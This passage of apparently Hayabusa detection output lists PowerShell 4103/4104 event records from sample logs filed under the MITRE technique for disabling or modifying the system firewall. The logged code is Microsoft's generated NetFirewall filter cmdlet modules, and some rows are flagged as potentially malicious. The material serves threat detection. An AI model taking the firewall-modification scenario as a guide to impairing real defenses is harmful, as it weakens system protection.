[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.026 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 
'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.027 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.027 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.027 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.028 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.075 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.075 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.076 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.076 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.077 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.078 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.110 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.111 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.112 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.112 
+00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
